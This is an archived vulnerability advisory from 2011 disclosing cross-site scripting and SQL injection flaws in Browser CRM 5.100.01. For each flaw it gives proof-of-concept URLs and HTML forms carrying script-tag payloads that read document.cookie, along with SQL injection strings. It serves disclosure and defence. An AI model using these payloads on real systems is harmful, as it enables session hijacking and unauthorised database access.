what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Browser CRM 5.100.01 Cross Site Scripting / SQL Injection

Browser CRM 5.100.01 Cross Site Scripting / SQL Injection
Posted Dec 15, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

Browser CRM version 5.100.01 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | bae97a2f001f9e5a7e7f686512d05a5386310e22c1fd7651534103e0c0799133

Browser CRM 5.100.01 Cross Site Scripting / SQL Injection

Change Mirror Download
Vulnerability ID: HTB23059
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_browser_crm.html
Product: Browser CRM
Vendor: BrowserCRM Limited ( http://www.browsercrm.com )
Vulnerable Version: 5.100.01 and probably prior
Tested Version: 5.100.01
Vendor Notification: 23 November 2011
Vulnerability Type: XSS, SQL Injection
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Browser CRM, which can be exploited to perform cross-site scripting, sql injection attacks.

1) Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site

The following PoC code is available:

http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/modules/calendar/customise_calendar_times.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")

2) Input passed via the "login[]" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:


<form action="http://[host]/index.php" method="post">
<input type="hidden" name="login[host]" value='"><script>alert(1);</script>'>
<input type="hidden" name="login[password]" value='"><script>alert(2);</script>'>
<input type="hidden" name="login[rebuild_cache]" value='"><script>alert(3);</script>'>
<input type="hidden" name="login[remember_me]" value='"><script>alert(4);</script>'>
<input type="hidden" name="login[skin]" value='"><script>alert(5);</script>'>
<input type="hidden" name="login[username]" value='"><script>alert(6);</script>'>
<input type="submit" value="submit" id="btn">
</form>


3) Input passed via the "framed" GET parameter to /licence/index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/licence/index.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

4) Input passed via the "framed" GET parameter to /licence/view.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

5) Input passed via the "login[username]" POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:


<form action="http://[host]/index.php" method="post">
<input type="hidden" name="login[username]" value='1" SQL_CODE_HERE'>
<input type="submit" value="submit" id="btn">
</form>


6) Input passed via the "login[]" POST parameters to /pub/clients.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:


<form action="http://[host]/pub/clients.php" method="post">
<input type="hidden" name="login[host]" value='"><script>alert(1);</script>'>
<input type="hidden" name="login[username]" value='"><script>alert(2);</script>'>
<input type="hidden" name="login[password]" value='"><script>alert(3);</script>'>
<input type="hidden" name="login[webform]" value='"><script>alert(4);</script>'>
<input type="hidden" name="login[disable_email_check]" value='"><script>alert(5);</script>'>
<input type="hidden" name="login[client_email]" value='"><script>alert(6);</script>'>
<input type="hidden" name="login[client_password]" value='"><script>alert(7);</script>'>
<input type="submit" value="submit" id="btn">
</form>


7) Input passed via the "parent_id" GET parameter to /modules/Documents/version_list.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/modules/Documents/version_list.php?parent_id=1%20AND%201=2%20--%202

Successful exploitation of this vulnerability requires attacker to be registered and logged-in.

8) Input passed via the "contact_id" GET parameter to /modules/Documents/version_list.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/modules/Documents/index.php?id=1&contact_id=1%27%20OR%20%271%27=%271

Successful exploitation of this vulnerability requires attacker to be registered and logged-in.



Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close